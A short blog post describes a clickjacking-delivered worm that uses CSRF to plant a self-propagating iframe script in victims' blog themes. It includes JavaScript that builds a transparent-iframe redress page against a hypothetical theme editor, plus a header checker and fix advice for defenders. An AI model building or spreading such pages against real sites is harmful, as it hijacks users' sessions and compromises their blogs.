When ClickJacking comes up, the first thing most people think of is using it to hijack a webcam or microphone. Let's set the webcam-jacking tricks aside this time. I have been thinking about how iFrame redressing (ClickJacking) could be turned against web application security, and my mind finally landed on one word: 'Worm'.

Just like the Click-Jacking style Joomla CMS hijacking, CSRF plus automation is all that is needed to infect blogs, CMSes, forums and so on. Possible? Yes indeed!

Scenario :

  • The victim logs in to his/her blog and does not sign out.
  • The victim visits a malicious site that uses Click-Jacking: any click there is routed into a CSRF request that attempts to insert a script into the victim's blog theme (through a theme editor such as the WordPress Theme Editor).
  • The inserted script generates an iFrame that carries the same Click-Jacking page.
  • The victim's blog is now a zombie that tries to infect the blogs of everyone who visits it.
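
To make the mechanics concrete, here is an added example (my own illustration, not code from the original post). It assembles the redress page the scenario relies on, a transparent iframe of the target stacked over a decoy button, and a checker for the two response headers that decide whether a page can be framed by another origin at all. The target URL, origins and header values are made up for illustration; the CSP source matching is a simplified version of the real algorithm (exact origin, 'self', '*', 'none').

```javascript
// Added example, not from the original post. Target URL and origins are hypothetical.

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// The classic redress page: a full-size, fully transparent iframe of the
// target page sits on top of a decoy button, so the victim's click lands on
// the framed page's real button (e.g. a theme editor's "save" button) in
// the victim's own authenticated session. The offsets are chosen so that
// the target's button lines up with the decoy.
function buildRedressPage(targetUrl, decoyText) {
  const frameStyle = [
    'position:absolute', 'top:-180px', 'left:-320px',
    'width:1200px', 'height:800px',
    'opacity:0',   // invisible to the victim
    'z-index:2',   // but on top, so it receives the click
    'border:0',
  ].join(';');
  const decoyStyle = 'position:absolute;top:20px;left:20px;z-index:1';
  return [
    '<!doctype html><html><body>',
    `<button style="${decoyStyle}">${escapeHtml(decoyText)}</button>`,
    `<iframe src="${escapeHtml(targetUrl)}" style="${frameStyle}"></iframe>`,
    '</body></html>',
  ].join('\n');
}

// Defensive check: given the target's response headers and the attacker's
// page origin, can the target be embedded in an attacker-controlled frame?
// CSP frame-ancestors takes precedence over X-Frame-Options when both are
// present. Missing headers, unknown X-Frame-Options values and the obsolete
// ALLOW-FROM form are ignored by current browsers, so they leave the page
// frameable.
function canBeFramed(headers, attackerOrigin, targetOrigin) {
  const get = name => {
    const k = Object.keys(headers).find(h => h.toLowerCase() === name);
    return k ? headers[k] : null;
  };
  const csp = get('content-security-policy');
  if (csp) {
    const dir = csp.split(';').map(d => d.trim())
      .find(d => d.toLowerCase().startsWith('frame-ancestors'));
    if (dir) {
      const sources = dir.split(/\s+/).slice(1)
        .map(s => s.toLowerCase().replace(/^'|'$/g, ''));
      if (sources.includes('none')) return false;
      if (sources.includes('*')) return true;
      return sources.some(src =>
        (src === 'self' && attackerOrigin === targetOrigin) ||
        src === attackerOrigin.toLowerCase());
    }
  }
  const xfo = get('x-frame-options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return attackerOrigin === targetOrigin;
  }
  return true;
}

// Constructed sample: the attacker's page framing a hypothetical theme editor.
const samplePage = buildRedressPage(
  'https://blog.example/admin/theme-editor', 'Click here to win');
```

Run `canBeFramed` against the real headers of your own blog's admin pages: if it returns true for an origin you do not control, the first step of the scenario above is open, and the fix is a `frame-ancestors` directive (or `X-Frame-Options: DENY`) on every authenticated page, independent of any CSRF tokens on the forms.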

Isn’t it lovely? Just a thought . . .


3 Responses to “The Net of Worms – ClickJacking Delivered Worm”

  1. ymm0t says:

    When I saw your video (the Joomla clickjacking video), I thought it was so awesome! Errr... would you mind sharing the script here? hehe :lol:

  2. Noctis says:

    Nice technique, my master. I want you to share your technique with me. I'll wait for your next post. If you have time, visit my site.

    regards,
    Noctis
